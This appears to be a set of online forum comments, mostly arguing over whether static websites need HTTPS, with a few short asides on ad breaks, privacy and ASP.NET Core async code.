This is what I find difficult about these things, we (mostly) intuitively know that some cases it's okay to use information about users to tweak their experience, while we also know that what Facebook/Google/etc are doing is absolutely wrong.
The big question is, where do we draw the (legal) line?
don't browsers send a header telling the server what language they expect?
I live in Belgium where there's 3 national languages, and my preference isn't even one of them. Please us whatever language my browser tells you to (English)
I think the correct analogy would be that there's a corner in the screen where advertisement is playing constantly while whatever show you're watching runs.
Obviously the advertisement is going to distract you from time to time, and you won't have your full attention on the show.
Is forcibly breaking away from the content you want to watch every 10 minutes to show ads not distracting?
or the 2 minutes of repeated content from before the break to remind you what was happening before you got distracted by the ads not also distracting?
Have you ever watched a show with the ads removed and seen how much of it is actually repeated just because of ad placements?
Just because it's not on screen the entire time doesn't mean it isn't a distraction. TV ad breaks are one of the best methods for producers - guaranteed impressions, broad audiences, official metrics, etc. - whilst also being the worst for consumers. An hour of my time set aside for watching something I enjoy now contains 20 minutes of content I don't care about at all, and cannot skip/bypass if not interested, and the 40 minutes of content is closer to 30 because of repeated content either side of ad breaks.
I haven't worked with ASP.NET Core for a while now, but what exactly do you refer to with "ridiculously bloated code"?
async-await doesn't add much extra code, save the occasional await keyword sometimes?
Yes, that's just the DI that does that, the async/await just gives you ridiculous call stacks and untraceable errors, usually for zero performance gains.
"We designed this service to reliably hold a huge amount of data. This setup will serve you best if it’s used to store compressed data archives or backups."
"Do you offer backups with this service?
Unfortunately, no. Users have to regularly back up the data themselves. "
That sounds a little contradicting
I don't disagree with what you're saying, but I feel HTTPS everywhere does not belong in that list.
Secure by default doesn't sound evil to me, and Let's Encrypt made it easy enough to get free HTTPS certificates (and for non technical people, almost all hosting services I've seen offer it out of the box)
A static blog that takes no user input/data will still leak the pages on that blog you visit, and the times you visited them. Knowing that you went to a particular page on a particular blog is a lot more information than knowing if you went to a domain. If I know you read about Conan the Barbarian on three different blogs, I know to send you ads about Conan the Barbarian (as a trivial example.)
I think authors want to ensure their writings are not edited, censored or otherwise tampered with while in transit to the reader. HTTPS isn't perfect, but this is one of the benefits it provides. It isn't only about encryption or privacy.
The NSA (and who knows who else) has the ability to tamper with TLS encrypted traffic, so that’s a moot point. Also easily defeated in the client by adding a rogue proxy and CA.
I don't think there's anywhere near a consensus that your statement here is true. In fact, I think it would be a surprise to the majority of the tech community if that were the case.
In a perfect world, sure, static sites don't need HTTPs. However, ISPs and other malevolent middle-parties have demonstrated why HTTPS is a must.
We've seen everything from injecting tracking javascript, to injecting their own ads, to outright replacing content with unrelated content that the ISP wants to push.
in a perfect world, we would not secure the transport but the content itself. and everyone should be able to build their own web-of-trust. why i as a (web-) publisher and my readers have to rely on the grace of just a few root CAs? i know technically it is possible to import my home-made CA cert in browsers, but it's not made easy: my server cert can not be signed by more than 1 parties; android requisites an unlock code in order to have custom CA certs - first when i saw this i was like "why the hell?", i mean i can imagine this is safety feature for simple users but come on!
That link does not load for me. The redirect to the the captcha is broken. Sincere question - is that the point? In other words Google blocks the captcha loading since the site isn't using HTTPS?
Let's Encrypt has de facto monopoly. I think we could have added HTTPS if we had dozens of projects like Let's Encrypt otherwise this is just handing over too much control to one organisation.
LetsEncrypt doesn't owe anyone free certificates, either. The point is that AWS isn't an alternative unless you're spending money with AWS. Nobody is wondering whether you can get a certificate by paying someone.
> Let's Encrypt made it easy enough to get free HTTPS certificates
Just checked.
My hosting provider asks 2x more money for SSL addon (which includes unique IP, unlimited subdomains, and free certificate). They wrote on the support forum I need that addon regardless on which certificate I gonna use, the included free one, or any other like lets encrypt.
Not gonna switch hosting nor pay 2x more for it just to please Google.
My web site has no comments or other user-generated content, runs no CMS, uses no cookies, collects no data except standard web server logs, hosts no executables, and has no secret nor security sensitive content.
At Starbucks I can inject arbitrary content into the browser of anyone who visits your site over HTTP and take control of their browser.
Furthermore, congrats on your site but you’re 0.01% of sites like that. Should we keep an insecure web because your hosting provider is ripping you off? TLS is easy and free in 2021.
> Furthermore, congrats on your site but you’re 0.01% of sites like that.
Thanks to the rise of the almighty platforms we've lost the will and know-how to do it ourselves.
> TLS is easy and free in 2021.
Only if you're relying on complicated cloud infra or (non-free) managed providers that do everything for you. It's a lot of work to set this up on your own.
It's impossible to be simple at this point. It's like the automotive industry which collectively decided to use computers for everything. You can't repair things yourself now. It's ironic, too, because now the industry finds itself with a chip shortage. I can imagine lots of scenarios where our complicated infrastructure requirements bite us.
There should always be the option of not using TLS. It should be first-class and not require expertise to access or use.
It's actually very easy to set up a TLS server using certificates from Let's Encrypt or any other ACME-compliant certificate provider. If you're using Apache, mod_md[0] will manage all the details for you. After enabling mod_md and mod_ssl, a simple TLS server only requires a few lines of extra configuration compared to a basic non-TLS site:
If you're using Nginx rather than Apache I believe it still requires an external script to handle certificate renewal, but the process remains fairly simple. The same scripts will also work with Apache if you don't want to use mod_md.
Users can decide: find a browser which doesn’t put importance on cert usage. You’ll find this hard to find because every browser manufacturer realizes that 99.9% of users cannot make sound security decisions, so they shouldn’t have to. Things should default to secure.
There’s a trade off between protecting users and having a 100% free and open internet. An insecure internet is untrustworthy and therefore not useful, IMO.
This is far more common than you think. ISPs, hotels, cafes, mobile providers do this en masse far more than you think. Have you forgotten the NSA “SSL added and removed here”? That was a highly targeted attack against infrastructure. What we’re discussing here is 10x easier to achieve.
> And even if it was the risk is just crap injected into someone’s blog.
That “crap injected” has full control over the DOM, any authentication, and everything displayed. How many of your users would happily put their creds into a fake login modal that popped up claiming to be SSO for a popular identity provider?
Without encryption active attacker could redirect users to different website, which would collect more data than your website does normally. They could also inject ads and javascript into users' sessions through your website.
Redirecting an unencrypted webpage could be the first step a hacker uses to take over a user's computer. It's best to minimize attack vectors as much as possible
It doesn’t matter much what your web site has today. If it’s available over HTTP an attacker can inject whatever it wants into the page without too much trouble at all.
I think you're mixing different problems here. You can't blame Google nor HTTPS if your hosting provider is trying to rip you off. You don't need unique IPs or unlimited subdomains to get an SSL certificate, these are just forced requirements from your provider.
Your hosting provider sounds incompetent. There is no need for unique IP to host TLS encrypted website, SNI support nowadays is ubiquitous. Let's Encrypt issues wildcard certificates for free as well.
There is no technical reason for asking 2x more money for encryption in 2021.